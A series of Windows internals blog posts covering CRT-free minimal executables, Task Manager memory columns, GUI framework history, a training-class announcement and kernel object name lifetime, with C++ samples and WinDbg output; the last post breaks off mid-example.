The “security cookie” feature can be removed with another compiler option:

When rebuilding, we get a warning about the “/sdl” (Security Developer Lifecycle) option conflicting with removing the security cookie, which we can remove as well. Regardless, the final linker error remains – mainCRTStartup.

We can rename main to mainCRTStartup and “implement” printf by going straight to the console API (part of Kernel32.Dll):

#include <Windows.h>

int mainCRTStartup() {
	char text[] = "Hello, World!\n";
	::WriteConsoleA(::GetStdHandle(STD_OUTPUT_HANDLE),
		text, (DWORD)strlen(text), nullptr, nullptr);

	return 0;
}

This compiles and links ok, and we get the expected output. The file size is only 4KB! An improvement even over the initial project. The dependencies are still just Kernel32.DLL, with the only two functions used:

You may be thinking that although we replaced printf, that’s wasn’t the full power of printf – it supports various format specifiers, etc., which are going to be difficult to reimplement. Is this just a futile exercise?

Not necessarily. Remember that every user mode process always links with NTDLL.dll, which means the API in NtDll is always available. As it turns out, a lot of functionality that is implemented by the CRT is also implemented in NTDLL. printf is not there, but the next best thing is – sprintf and the other similar formatting functions. They would fill a buffer with the result, and then we could call WriteConsole to spit it to the console. Problem solved!

Removing the CRT

Well, almost. Let’s add a definition for sprintf_s (we’ll be nice and go with the “safe” version), and then use it:

#include <Windows.h>

extern "C" int __cdecl sprintf_s(
	char* buffer,
	size_t sizeOfBuffer,
	const char* format,	...);

int mainCRTStartup() {
	char text[64];
	sprintf_s(text, _countof(text), "Hello, world from process %u\n", ::GetCurrentProcessId());
	::WriteConsoleA(::GetStdHandle(STD_OUTPUT_HANDLE),
		text, (DWORD)strlen(text), nullptr, nullptr);

	return 0;
}

Unfortunately, this does not link: sprintf_s is an unresolved external, just like strlen. It makes sense, since the linker does not know where to look for it. Let’s help out by adding the import library for NtDll:

#pragma comment(lib, "ntdll")

This should work, but one error persists – sprintf_s; strlen however, is resolved. The reason is that the import library for NtDll provided by Microsoft does not have an import entry for sprintf_s and other CRT-like functions. Why? No good reason I can think of. What can we do? One option is to create an NtDll.lib import library of our own and use it. In fact, some people have already done that. One such file can be found as part of my NativeApps repository (it’s called NtDll64.lib, as the name does not really matter). The other option is to link dynamically. Let’s do that:

int __cdecl sprintf_s_f(
	char* buffer, size_t sizeOfBuffer, const char* format, ...);

int mainCRTStartup() {
	auto sprintf_s = (decltype(sprintf_s_f)*)::GetProcAddress(
        ::GetModuleHandle(L"ntdll"), "sprintf_s");
	if (sprintf_s) {
		char text[64];
		sprintf_s(text, _countof(text), "Hello, world from process %u\n", ::GetCurrentProcessId());
		::WriteConsoleA(::GetStdHandle(STD_OUTPUT_HANDLE),
			text, (DWORD)strlen(text), nullptr, nullptr);
	}

	return 0;
}

Now it works and runs as expected.

You may be wondering why does NTDLL implement the CRT-like functions in the first place? The CRT exists, after all, and can be normally used. “Normally” is the operative word here. Native applications, those that can only depend on NTDLL cannot use the CRT. And this is why these functions are implemented as part of NTDLL – to make it easier to build native applications. Normally, native applications are built by Microsoft only. Examples include Smss.exe (the session manager), CSrss.exe (the Windows subsystem process), and UserInit.exe (normally executed by WinLogon.exe on a successful login).

One thing that may be missing in our “main” function are command line arguments. Can we just add the classic argc and argv and go about our business? Let’s try:

int mainCRTStartup(int argc, const char* argv[]) {
//...
char text[64];
sprintf_s(text, _countof(text), 
    "argc: %d argv[0]: 0x%p\n", argc, argv[0]);
::WriteConsoleA(::GetStdHandle(STD_OUTPUT_HANDLE),
	text, (DWORD)strlen(text), nullptr, nullptr);

Seems simple enough. argv[0] should be the address of the executable path itself. The code carefully displays the address only, not trying to dereference it as a string. The result, however, is perplexing:

argc: -359940096 argv[0]: 0x74894808245C8948

This seems completely wrong. The reason we see these weird values (if you try it, you’ll get different values. In fact, you may get different values in every run!) is that the expected parameters by a true entry point of an executable is not based on argc and argv – this is part of the CRT magic. We don’t have a CRT anymore. There is in fact just one argument, and it’s the Process Environment Block (PEB). We can add some code to show some of what is in there (non-relevant code omitted):

#include <Windows.h>
#include <winternl.h>
//...
int mainCRTStartup(PPEB peb) {
	char text[256];
	sprintf_s(text, _countof(text), "PEB: 0x%p\n", peb);
	::WriteConsoleA(::GetStdHandle(STD_OUTPUT_HANDLE),
		text, (DWORD)strlen(text), nullptr, nullptr);

	sprintf_s(text, _countof(text), "Executable: %wZ\n", 
        peb->ProcessParameters->ImagePathName);
	::WriteConsoleA(::GetStdHandle(STD_OUTPUT_HANDLE),
		text, (DWORD)strlen(text), nullptr, nullptr);

	sprintf_s(text, _countof(text), "Commandline: %wZ\n", 
        peb->ProcessParameters->CommandLine);
	::WriteConsoleA(::GetStdHandle(STD_OUTPUT_HANDLE),
		text, (DWORD)strlen(text), nullptr, nullptr);

<Winternl.h> contains some NTDLL definitions, such as a partially defined PEB. In it, there is a ProcessParameters member that holds the image path and the full command line. Here is the result on my console:

PEB: 0x000000EAC01DB000
Executable: D:\Dev\Minimal\x64\Release\Test3.exe
Commandline: "D:\Dev\Minimal\x64\Release\Test3.exe"

The PEB is the argument provided by the OS to the entry point, whatever its name is. This is exactly what native applications get as well. By the way, we could have used GetCommandLine from Kernel32.dll to get the command line if we didn’t add the PEB argument. But for native applications (that can only depend on NTDLL), GetCommandLine is not an option.

Going Native

How far are we from a true native application? What would be the motivation for such an application anyway, besides small file size and reduced dependencies? Let’s start with the first question.

To make our executable truly native, we have to do two things. The first is to change the subsystem of the executable (stored in the PE header) to Native. VS provides this option via a linker setting:

The second thing is to remove the dependency on Kernel32.Dll. No more WriteConsole and no GetCurrentProcessId. We will have to find some equivalent in NTDLL, or write our own implementation leveraging what NtDll has to offer. This is obviously not easy, given that most of NTDLL is undocumented, but most function prototypes are available as part of the Process Hacker/phnt project.

For the second question – why bother? Well, one reason is that native applications can be configured to run very early in Windows boot – these in fact run by Smss.exe itself when it’s the only existing user-mode process at that time. Such applications (like autochk.exe, a native chkdsk.exe) must be native – they cannot depend on the CRT or even on kernel32.dll, since the Windows Subsystem Process (csrss.exe) has not been launched yet.

For more information on Native Applications, you can view my talk on the subject.

I may write a blog post on native application to give more details. The examples shown here can be found here.

Happy minimization!

Memory Information in Task Manager

12 April 2023 at 14:36

You may have been asked this question many times: “How much memory does this process consume?” The question seems innocent enough. Your first instinct might be to open Task Manager, go to the Processes tab, find the process in the list, and look at the column marked “Memory“. What could be simpler?

A complication is hinted at when looking in the Details tab. The default memory-related column is named “Memory (Active Private Working Set)”, which seems more complex than simply “Memory”. Opening the list of columns from the Details tab shows more columns where the term “Memory” is used. What gives?

The Processes’ tab Memory column is the same as the Details’ tab Memory (active private working set). But what does it mean? Let’s break it down:

  • Working set – the memory is accessible by the processor with no page fault exception. Simply put, the memory is in RAM (physical memory).
  • Private – the memory is private to the process. This is in contrast to shared memory, which is (at least can be) shared with other processes. The canonical example of shared memory is PE images – DLLs and executables. A DLL that is mapped to multiple processes will (in most cases) have a single presence in physical memory.
  • Active – this is an artificial term used by Task Manager related to UWP (Universal Windows Platform) processes. If a UWP process’ window is minimized, this column shows zero memory consumption, because in theory, since all the process’ threads are suspended, that memory can be repurposed for other processes to use. You can try it by running Calculator, and minimizing its window. You’ll see this column showing zero. Restore the window, and it will show some non-zero value. In fact, there is a column named Memory (private working set), which shows the same thing but does not take into consideration the “active” aspect of UWP processes.

So what does all this mean? The fact that this column shows only private memory is a good thing. That’s because the shared memory size (in most cases) is not controllable and is fixed – for example, the size of a DLL – it’s out of our control – the process just needs to use the DLL. The downside of this active private working set column is that fact it only shows memory current part of the process working set – in RAM. A process may allocate a large junk of memory, but most of it may not be in RAM right now, but it is still consumed, and counts towards the commit limit of the system.

Here is a simple example. I’m writing the following code to allocate (commit) 64 GM of memory:

auto ptr = VirtualAlloc(nullptr, 64LL << 30, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

Here is what Task manager shows in its Performance/Memory tab before the call:

“In Use” indicates current RAM (physical memory) usage – it’s 34.6 GB. The “Committed” part is more important – it indicates how much memory I can totally commit on the system, regardless of whether it’s in physical memory now or not. It shows “44/128 GB” – 44 GB are committed now (34.6 of that in RAM), and my commit limit is 128 GB (it’s the sum of my total RAM and the configured page files sizes). Here is the same view after I commit the above 64 GB:

Notice the physical memory didn’t change much, but the committed memory “jumped” by 64 GB, meaning there is now only 20 GB left for other processes to use before the system runs out of memory (or page file expansion occurs). Looking at the Details that for this Test process shows the active private working set column indicating a very low memory consumption because it’s looking at private RAM usage only:

Only when the process starts “touching” (using) the committed memory, physical pages will start being used by the process. The name “committed” indicates the commitment of the system to providing that entire memory block if required no matter what.

Where is that 64 GB shown? The column to use is called in Task Manager Commit Size, which is in fact private committed memory:

Commit Size is the correct column to look at when trying to ascertain memory consumption in processes. The sad thing is that it’s not the default column shown, and that’s why many people use the misleading active private working set column. My guess is the reason the misleading column is shown by default is because physical memory is easy to understand for most people, whereas virtual memory – (some of which is in RAM and some which is not) is not trivially understood.

Compare Commit Size to active private working set sometimes reveals a big difference – an indication that most of the private memory of a process is not in RAM right now, but the memory is still consumed as far as the memory manager is concerned.

A related confusion exists because of different terminology used by different tools. Specifically, Commit Size in Task Manager is called Private Bytes in Process Explorer and Performance Monitor.

Task Manager’s other memory columns allow you to look at more memory counters such as Working Set (total RAM used by a process, including private and shared memory), Peak Working Set, Memory (shared working set), and Working Set Delta.

There are other subtleties I am not expanding on in this post. Hopefully, I’ll touch on these in a future post.

Bottom line: Commit Size is the way to go.

The Quest for the Ultimate GUI Framework

22 April 2023 at 02:09

I love Graphical User Interfaces, especially the good ones 🙂 Some people feel more comfortable with a terminal and command line arguments – I prefer a graphical representation, especially when visualization of information can be much more effective than text (even if colorful).

Most of the tools I write are GUI tools; I like colors and graphics – computers are capable of so much graphic and visualization power – why not see it in all its glory? GUIs are not a silver bullet by any means. Sometimes bad GUIs are encountered, which might send the user to the command terminal. I’m not going to discuss here what makes up a good GUI. This post is about technologies to create GUIs.

Disclaimer: much of the rest of this post is subjective – my experience with Windows GUIs. I’m also not discussing web UI – not really in the same scope. I’m interested in taking advantage of the machine, not being constrained or affected by some browser or HTML/CSS/JS engine. The discussion is not exhaustive, either; there is a limit to a post 🙂

In the old days, the Win32 User Interface reined supreme. It was created in the days where memory was scarce, colors were few, hardware acceleration did not exist, and consistency was the name of the game. Modern GUIs were just starting to come up.

Windows supports all the standard controls (widgets) a typical GUI application would need. From buttons and menus, to list views and tree views, to edit controls, the standard set of typical application usage was covered. The basis of the Win32 GUI model was (and still is) the might Handle to Window (HWND). This entity represented the surface on which the window (typically a control) would render its graphical representation and handle its interaction logic. This worked fairly well throughout the 1990s and early 2000s.

The model was not perfect, but any means. Customizing controls was difficult, and in some cases downright impossible. Built-in customization was minimal, any substantial customization required subclassing – essentially taking control of handling some window messages differently in the hope of not breaking integration with the default message processing. It was a lot of work at best, and imperfect or impossible at worse. Messages like WM_PAINT and WM_ERASEBKGND were commonly overridden, but also mouse and keyboard-related messages. In some cases, there was no good option for customization and full blown control had to be written from scratch.

Here is a simple example: say you want to change the background color of a button. This should in theory be simple – change some property and you’re done. Not so easy with the Win32 button – it had to be owner-drawn or custom-drawn (WM_CUSTOMDRAW) in later versions of Windows. And that’s really a simple example.

Layout didn’t really exist. Controls were placed at an (x,y) coordinate measured from the top-left corner of the parent window – in pixels, mind you – with a specified width and height. There were no “panels” to handle more complex layout, in a grid for example, horizontally, or vertically, etc.

From a programmatic perspective, working directly with the Windows GUI API was no picnic either. Microsoft realized this, and developed The Microsoft Foundation Classes (MFC) library in the early 1990s to make working with Win32 GUI somewhat easier, by wrapping some of the functionality in C++ classes, and adding some nice features like docking windows. MFC was very popular at the time, as it was easier to use when getting started with building GUIs. It didn’t solve anything fundamental, as it was just using the Win32 GUI API under the covers. Several third-party libraries were written on top of MFC to provide even more functionality out of the box. MFC can still be used today, with Visual Studio still providing wizards and other helpers for MFC developers.

MFC wasn’t perfect of course. Beyond the obvious usage of the Win32 UI controls, it was fairly bloated, dragging with it a large DLL or adding a big static chunk if linked statically. Another library came out, the Windows Template Library (WTL), that provided a thin layer around the Windows GUI API, based on template classes, meaning that there was no “runtime” in the same sense as MFC – no library to link with – just whatever is compiled directly.

Personally, I like WTL a lot. In fact, my tools in recent years use WTL exclusively. It’s much more flexible than MFC, and doesn’t impose a particular way of working as MFC strongly did. The downside is that WTL wasn’t an official Microsoft library, mostly developed by good people inside the company in their spare time. Visual Studio has no special support for WTL. That said, WTL is still being maintained, and had some incremental features added throughout the years.

At the same time as MFC and WTL were used by C++ developers, another might tool entered the scene: Visual Basic. This environment was super successful for primary two reasons:

  • The programming language was based on BASIC, which many people had at least acquaintance with, as it was the most common programming language for personal computers in the 1980s and early 1990s.
  • The “Visual” aspect of Visual Basic was new and compelling. Just drag controls from a toolbox onto a surface, change properties in the designer and/or at runtime, connect to events easily, and you’re good to go.

To this day, I sometimes encounter customers and applications still built with Visual Basic 6, even though its official support date is long gone.

The .NET Era

At around 2002, .NET and C# were introduced by Microsoft as a response to the Java language and ecosystem that came out in 1995. With .NET, the Windows Forms (WinForms) library was provided, which was very similar to the Visual Basic experience, but with the more modern and powerful .NET Framework. And with .NET 2 in 2005, where .NET really kicked in (generics and other important features released), Windows Forms was the go-to UI framework while Visual Basic’s popularity somewhat waning.

However, WinForms was still based around the Win32 GUI model – HWNDs, no easy customization, etc. However, Microsoft did a lot of work to make WinForms more customizable than pure Win32 or MFC by subclassing many of the existing controls and adding functionality available with simple properties. Support was added to customize menus with colors and icons, buttons with images and custom colors, and more. The drag-n-drop experience from Visual Basic was available as well, making it relatively easy to migrate from Visual Basic.

.NET 3 and WPF

The true revolution came in 2006 when .NET 3 was released. .NET 3 had 3 new technologies that were greatly advertised:

WCF was hugely successful, and took over older technologies as it unified all types of communications, whether based on remoting, HTTP, sockets, or whatever. WF had only moderate success.

WPF was the new UI framework, and it was revolutionary. WPF ditched the Win32 UI model – a WPF “main” window still had an HWND – you can’t get away with that – but all the controls were drawn by WPF – the Win32 UI controls were not used. From Win32’s perspective there was just one HWND. Compare that to Win32 UI model, where every control is an HWND – buttons, list boxes, list views, toolbars, etc.

With the HWND restrictions gone, WPF used DirectX for rendering purposes, compared to the aging Graphics Device Interface (GDI) API used by Win32 GUIs. Without the artificial boundaries of HWNDs, WPF could do anything – combine anything – 2D, 3D, animation, media, unlimited customization – without any issues, as the entire HWND surface belonged to WPF.

I remember when I was introduced to WPF (at that time code name “Avalon”) – I was blown away. It was a far cry from the old, predictable, non-customizable model of Win32 GUIs.

WPF wasn’t just about the graphics and visuals. It also provided powerful data binding, much more powerful than the limited model supported by WinForms. I would even go so far as say it’s one of the most important of WPF’s features. WPF introduced XAML – an XML based language to declaratively build UIs, with object creation, properties, and even declarative data binding. Customizing controls could be done in several ways, including existing properties, control templates and data templates. WPF was raw power.

So, is WPF the ultimate GUI framework? It certainly looked like a prime candidate.

WPF made progress, ironing out issues, adding some features in .NET 3.5 and .NET 4. But then it seemed to have grinded to a halt. WPF barely made some minor improvements in .NET 4.5. One can say that it was pretty complete, so perhaps nothing much to add?

One aspect of WPF not dealt with well was performance. WPF could be bogged down by many control with complex data bindings – data bindings were mostly implemented with Reflection – a flexible but relatively slow .NET mechanism. There was certainly opportunities for improvement. Additionally, some controls were inherently slow, most notable the DataGrid, which was useful, but problematic as it was painfully slow. Third party libraries came in to the rescue and provided improved Data Grids of their own (most not free).

WPF had a strong following, with community created controls, and other goodies. Microsoft, however, seemed to have lost interest in WPF, the reason perhaps being the “Metro” revolution of 2012.

“Metro” and Going Universal

Windows 8 was a major release for Microsoft where UI is concerned. The “Metro” minimal language was all the rage at the time. Touch devices started to appear and Microsoft did not want to lose the battle. I noticed that Microsoft tends to move from one extreme to another, finally settling somewhere in the middle – but that usually takes years. Windows 8 is a perfect example. Metro applications (as they were called at the time) were always full screen – even on desktops with big displays. A new framework was built, based around the Windows Runtime – a new library based on the old but trusty Component Object Model (COM), with metadata used with the .NET metadata format.

The Windows Runtime UI model was built on similar principles as WPF – XAML (not the same one, mind you; that would be too easy), data binding, control templates, and other similar (but simplified) concepts from WPF. The Windows Runtime was internally built in C++, with “convenient” language projections provided out of the box for C++ (C++/CX at the time), .NET (C# and VB), and even JavaScript.

Generally, Windows 8 and the Universal applications (as they were later renamed) were pretty terrible. The “Metro design language”, with its monochromatic simplistic icons and graphics was ridiculous. Colors were gone. I felt like I’m sliding back to the 1980s when colors were limited. This “Metro” style spread everywhere as far as Microsoft is concerned. For example, Visual Studio 2012 that was out at the time was monochromatic – all icons in black only! It was a nightmare. Microsoft’s explanation was “to focus the developer attention to the code, remove distractions”. In actually, it failed miserably. I remember the control toolbox for WinForms and WPF in VS 2012 – all icons were gray – there was just no way to distinguish between them at a glance – which destroys the point of having icons in the first place. Microsoft boasted that their designers managed to make all these once colorful icons with a single color! What an achievement.

With Visual Studio 2013, they started to bring some colors back… the whole thing was so ridiculous.

The “Universal” model was created at least to address the problem of creating applications with the same code for Windows 8 and Windows Phone 8. To that end, it was successful, as the Win32 GUI was not implemented on Windows Phone, presumably because it was outdated, with lots and lots of code that is not well-suited for a small, much less powerful, form factor like the phone and other small devices.

Working with Universal applications (now called Universal Windows Platform applications) was similar to WPF to some extent, but the controls were geared towards touch devices, where fingers are mostly used. Controls were big, list views were scrolling smoothly but had very few lines of content. For desktop applications, it was a nightmare. Not to mention that Windows 7 (still very popular at the time) was not supported.

WPF was still the best option in the Microsoft space at the time, even though it stagnated. At least it worked on Windows 7, and its default control rendering was suited to desktop applications.

Windows 8.1 made some improvements in Universal apps – at least a minimize button was added! Windows 10 fixed the Universal fiasco by allowing windows to be resized normally like in the “old” days. There was a joke at the time saying that “Windows 10 returned windows to Windows. Before that it was Window – singular”.

That being said, Windows 10’s own UI was heavily influenced by Metro. The settings up use monochrome icons – how can anyone think this is better than colorful icons for easy recognition. This trend continues with Windows 11 where various classic windows are “converted” to the new “design language”. At least the settings app uses somewhat colorful icons on Windows 11.

The Universal apps could only run with a single instance, something that has since changed, but still employed. For example, the settings app in Windows 10 and 11 is single instance. Why on earth should it be in an OS named “Windows”? Give me more than one Settings window at a time!

Current State of Affairs

WPF is not moving forward. With the introduction of .NET Core (later renamed to simply .NET), WPF was open sourced, and is available in .NET 5+. It’s not cross platform, as most of the other .NET 5+ pieces.

UWP is a failure, even Microsoft admits that. It’s written in C++ (it’s based on the Windows Runtime after all), which should give it good performance not bogged down by .NET’s garbage collector and such. But its projections for C++ is awful, and in my opinion unusable. If you create a new UWP application with C++ in Visual Studio, you’ll get plenty of files, including IDL (Interface Definition Language), some generated files, and all that for a single button in a window. I tried writing something more complex, and gave up. It’s too slow and convoluted. The only real option is to use .NET – something I may not want to do with all its dependencies and overhead.

Regardless, the controls default look and feel is geared towards touch devices. I don’t care about the little animations – I want to be able to use a proper list view. For example, the Windows 11 new Task Manager that is built with the new WinUI technology (described next) uses the Win32 classic list view – because it’s fast and appropriate for this kind of tool. The rest is WinUI – the tabs are gone, there are monochromatic icons – it’s just ridiculous. The WinUI adds nothing except a dark theme option.

Task manager in Windows 11

The WinUI technology is similar to UWP in concept and implementation. The current state of UI affairs is messy – there is WinUI, UWP, .NET Maui (to replace Xamarin for mobile devices but not just) – what are people supposed to use?

All these UI libraries don’t really cater for desktop apps. This is why I’m still using WTL (which is wrapping the Win32 classic GUI API). There is no good alternative from Microsoft.

But perhaps not all is lost – Avalonia is a fairly new library attempting to bring WPF style UI and capabilities to more than just Windows. But it’s not a Microsoft library, but built by people in the community as open source – there is no telling if at some point it will stop being supported. On the other hand, WPF – a Microsoft library – stopped being supported.

Other Libraries

At this point you may be wondering why use a Microsoft library at all for desktop GUI – Microsoft has dropped the ball, as they continue to make a mess. Maybe use Blazor on the desktop? Out of scope for this post.

There are other options. many GUI libraries that use C or C++ exist – wxWidgets, GTK, and Qt, to name a few. wxWidgets supports Windows fairly well. Installing GTK successfully is a nightmare. Qt is very powerful and takes control of drawing everything, similar to the WPF model. It has powerful tools for designing GUIs, with its own declarative language based on JavaScript. With Qt you also have to use its own classes for non-UI stuff, like strings and lists. It’s also pricey for closed source.

Another alternative which has a lot of promise (some of which is already delivered) is Dear ImGui. This library is different from most others, as it’s Immediate Mode GUI, rather than Retained Mode which most other are. It’s cross platform, very flexible and fast. Just look at some of the GUIs built with it – truly impressive.

I’ll probably migrate to using ImGui. Is it the ultimate GUI framework? Not yet, but I feel it’s the closest to attain that goal. A couple of years back I implemented a mini-Process Explorer like tool with ImGui. Its list view is flexible and rich, and the library in general gets better all the time. It has great support from the authors and the community. It’s not perfect yet, there are still rough edges, and in some cases you have to work harder because of its cross-platform nature.

I should also mention Uno Platform, another cross-platform UI framework built on top of .NET, that made great strides in recent years.

What’s Next?

Microsoft has dropped the ball on desktop apps. The Win32 classic model is not being maintained. Just try to create a “dark mode” UI. I did that to some extent for the Sysinternals tools at the time. It was hard. Some things I just couldn’t do right – the scrollbars that are attached to list views and tree views, for example.

Prior to common controls version 6 (Vista), Microsoft had a “flat scroll bars” feature that allowed customization of scrollbars fairly easily (colors, for example). But surprisingly, common controls version 6 dropped this feature! Flat scroll bars are no longer supported. I had to go through hoops to implement dark scroll bars for Sysinternals – and even that was imperfect.

In my own tools, I created a theme engine as well – implemented differently – and I decided to forgo customizing scroll bars. Let them remain as is – it’s just too difficult and fragile.

I do hope Microsoft changes something in the way they look at desktop apps. This is where most Windows users are! Give us WPF in C++. Or enhance the Win32 model. The current UI mess is not helping, either.

I’m going to set some time to work on building some tools that use Dear ImGui – I feel it has the most bang for the buck.

Upcoming Training Classes for June & July

23 April 2023 at 20:27

I’m happy to announce 3 upcoming remote training classes to be held in June and July.

Windows System Programming

This is a 5-day class, split into 10 half-days. The syllabus can be found here.

All times are 11am to 3pm ET (8am to 11am, PT) (4pm to 8pm, London time)

June: 7, 8, 12, 14, 15, 19, 21, 22, 26, 28

Cost: 950 USD if paid by an individual, 1900 USD if paid by a company.

COM Programming

This is a 3-day course, split into 6 half-days. The syllabus can be found here.

All times are 11am to 3pm ET (8am to 11am, PT) (4pm to 8pm, London time)

July: 10, 11, 12, 17, 18, 19

Cost: 750 USD (if paid by an individual), 1500 USD if paid by a company.

x64 Architecture and Programming

This is a brand new, 3 day class, split into 6 half-days, that covers the x64 processor architecture, programming in general, and programming in the context of Windows. The syllabus is not finalized yet, but it will cover at least the following topics:

  • General architecture and brief history
  • Registers
  • Addressing modes
  • Stand-alone assembly programs
  • Mixing assembly with C/C++
  • MSVC compiler-generated assembly
  • Operating modes: real, protected, long (+paging)
  • Major instruction groups
  • Macros
  • Shellcode
  • BIOS and assembly

July: 24, 25, 26, 31, August: 1, 2

Cost: 750 USD (if paid by an individual), 1500 USD if paid by a company.

Registration

If you’d like to register, please send me an email to [email protected] and provide the name of the training class of interest, your full name, company (if any), preferred contact email, and your time zone. Previous participants in my classes get 10% off. If you register for more than one class, the second (and third) are 10% off as well.

The sessions will be recorded, so you can watch any part you may be missing, or that may be somewhat overwhelming in “real time”.

As usual, if you have any questions, feel free to send me an email, or DM on twitter (@zodiacon) or Linkedin (https://www.linkedin.com/in/pavely/).

Kernel Object Names Lifetime

14 May 2023 at 21:51

Much of the Windows kernel functionality is exposed via kernel objects. Processes, threads, events, desktops, semaphores, and many other object types exist. Some object types can have string-based names, which means they can be “looked up” by that name. In this post, I’d like to consider some subtleties that concern object names.

Let’s start by examining kernel object handles in Process Explorer. When we select a process of interest, we can see the list of handles in one of the bottom views:

Handles view in Process Explorer

However, Process Explorer shows what it considers handles to named objects only by default. But even that is not quite right. You will find certain object types in this view that don’t have string-based names. The simplest example is processes. Processes have numeric IDs, rather than string-based names. Still, Process Explorer shows processes with a “name” that shows the process executable name and its unique process ID. This is useful information, for sure, but it’s not the object’s name.

Same goes for threads: these are displayed, even though threads (like processes) have numeric IDs rather than string-based names.

If you wish to see all handles in a process, you need to check the menu item Show Unnamed Handles and Mappings in the View menu.

Object Name Lifetime

What is the lifetime associated with an object’s name? This sounds like a weird question. Kernel objects are reference counted, so obviously when an object reference count drops to zero, it is destroyed, and its name is deleted as well. This is correct in part. Let’s look a bit deeper.

The following example code creates a Notepad process, and puts it into a named Job object (error handling omitted for brevity):

PROCESS_INFORMATION pi;
STARTUPINFO si = { sizeof(si) };

WCHAR name[] = L"notepad";
::CreateProcess(nullptr, name, nullptr, nullptr, FALSE, 0, 
	nullptr, nullptr, &si, &pi);

HANDLE hJob = ::CreateJobObject(nullptr, L"MyTestJob");
::AssignProcessToJobObject(hJob, pi.hProcess);

After running the above code, we can open Process Explorer, locate the new Notepad process, double-click it to get to its properties, and then navigate to the Job tab:

We can clearly see the job object’s name, prefixed with “\Sessions\1\BaseNamedObjects” because simple object names (like “MyTestJob”) are prepended with a session-relative directory name, making the name unique to this session only, which means processes in other sessions can create objects with the same name (“MyTestJob”) without any collision. Further details on names and sessions is outside the scope of this post.

Let’s see what the kernel debugger has to say regarding this job object:

lkd> !process 0 1 notepad.exe
PROCESS ffffad8cfe3f4080
    SessionId: 1  Cid: 6da0    Peb: 175b3b7000  ParentCid: 16994
    DirBase: 14aa86d000  ObjectTable: ffffc2851aa24540  HandleCount: 233.
    Image: notepad.exe
    VadRoot ffffad8d65d53d40 Vads 90 Clone 0 Private 524. Modified 0. Locked 0.
    DeviceMap ffffc28401714cc0
    Token                             ffffc285355e9060
    ElapsedTime                       00:04:55.078
    UserTime                          00:00:00.000
    KernelTime                        00:00:00.000
    QuotaPoolUsage[PagedPool]         214720
    QuotaPoolUsage[NonPagedPool]      12760
    Working Set Sizes (now,min,max)  (4052, 50, 345) (16208KB, 200KB, 1380KB)
    PeakWorkingSetSize                3972
    VirtualSize                       2101395 Mb
    PeakVirtualSize                   2101436 Mb
    PageFaultCount                    4126
    MemoryPriority                    BACKGROUND
    BasePriority                      8
    CommitCharge                      646
    Job                               ffffad8d14503080

lkd> !object ffffad8d14503080
Object: ffffad8d14503080  Type: (ffffad8cad8b7900) Job
    ObjectHeader: ffffad8d14503050 (new version)
    HandleCount: 1  PointerCount: 32768
    Directory Object: ffffc283fb072730  Name: MyTestJob

Clearly, there is a single handle to the job object. The PointerCount value is not the real reference count because of the kernel’s tracking of the number of usages each handle has (outside the scope of this post as well). To get the real reference count, we can click the PointerCount DML link in WinDbg (the !truref command):

kd> !trueref ffffad8d14503080
ffffad8d14503080: HandleCount: 1 PointerCount: 32768 RealPointerCount: 3

We have a reference count of 3, and since we have one handle, it means there are two references somewhere to this job object.

Now let’s see what happens when we close the job handle we’re holding:

::CloseHandle(hJob);

Reopening the Notepad’s process properties in Process Explorer shows this:

Running the !object command again on the job yields the following:

lkd> !object ffffad8d14503080
Object: ffffad8d14503080  Type: (ffffad8cad8b7900) Job
    ObjectHeader: ffffad8d14503050 (new version)
    HandleCount: 0  PointerCount: 1
    Directory Object: 00000000  Name: MyTestJob

The handle count dropped to zero because we closed our (only) existing handle to the job. The job object’s name seem to be intact at first glance, but not really: The directory object is NULL, which means the object’s name is no longer visible in the object manager’s namespace.

Is the job object alive? Clearly, yes, as the pointer (reference) count is 1. When the handle count it zero, the Pointer Count is the correct reference count, and there is no need to run the !truref command. At this point, you should be able to guess why the object is still alive, and where is that one reference coming from.

If you guessed “the Notepad process”, then you are right. When a process is added to a job, it adds a reference to the job object so that it remains alive if at least one process is part of the job.

We, however, have lost the only handle we have to the job object. Can we get it back knowing the object’s name?

hJob = ::OpenJobObject(JOB_OBJECT_QUERY, FALSE, L"MyTestJob");

This call fails, and GetLastError returns 2 (“the system cannot find the file specified”, which in this case is the job object’s name). This means that the object name is destroyed when the last handle of the object is closed, even if there are outstanding references on the object (the object is alive!).

This the job object example is just that. The same rules apply to any named object.

Is there a way to “preserve” the object name even if all handles are closed? Yes, it’s possible if the object is created as “Permanent”. Unfortunately, this capability is not exposed by the Windows API functions like CreateJobObject, CreateEvent, and all other create functions that accept an object name.

Quick update: The native NtMakePermanentObject can make an object permanent given a handle, if the caller has the SeCreatePermanent privilege. This privilege is not granted to any user/group by default.

A permanent object can be created with kernel APIs, where the flag OBJ_PERMANENT is specified as one of the attribute flags part of the OBJECT_ATTRIBUTES structure that is passed to every object creation API in the kernel.

A “canonical” kernel example is the creation of a callback object. Callback objects are only usable in kernel mode. They provide a way for a driver/kernel to expose notifications in a uniform way, and allow interested parties (drivers/kernel) to register for notifications based on that callback object. Callback objects are created with a name so that they can be looked up easily by interested parties. In fact, there are quite a few callback objects on a typical Windows system, mostly in the Callback object manager namespace:

Most of the above callback objects’ usage is undocumented, except three which are documented in the WDK (ProcessorAdd, PowerState, and SetSystemTime). Creating a callback object with the following code creates the callback object but the name disappears immediately, as the ExCreateCallback API returns an object pointer rather than a handle:

PCALLBACK_OBJECT cb;
UNICODE_STRING name = RTL_CONSTANT_STRING(L"\\Callback\\MyCallback");
OBJECT_ATTRIBUTES cbAttr = RTL_CONSTANT_OBJECT_ATTRIBUTES(&name, 
    OBJ_CASE_INSENSITIVE);
status = ExCreateCallback(&cb, &cbAttr, TRUE, TRUE);

The correct way to create a callback object is to add the OBJ_PERMANENT flag:

PCALLBACK_OBJECT cb;
UNICODE_STRING name = RTL_CONSTANT_STRING(L"\\Callback\\MyCallback");
OBJECT_ATTRIBUTES cbAttr = RTL_CONSTANT_OBJECT_ATTRIBUTES(&name, 
    OBJ_CASE_INSENSITIVE | OBJ_PERMANENT);
status = ExCreateCallback(&cb, &cbAttr, TRUE, TRUE);

A permanent object must be made “temporary” (the opposite of permanent) before actually dereferencing it by calling ObMakeTemporaryObject.

Aside: Getting to an Object’s Name in WinDbg

For those that wonder how to locate an object’s name give its address. I hope that it’s clear enough… (watch the bold text).

lkd> !object ffffad8d190c0080
Object: ffffad8d190c0080  Type: (ffffad8cad8b7900) Job
    ObjectHeader: ffffad8d190c0050 (new version)
    HandleCount: 1  PointerCount: 32770
    Directory Object: ffffc283fb072730  Name: MyTestJob
lkd> dt nt!_OBJECT_HEADER ffffad8d190c0050
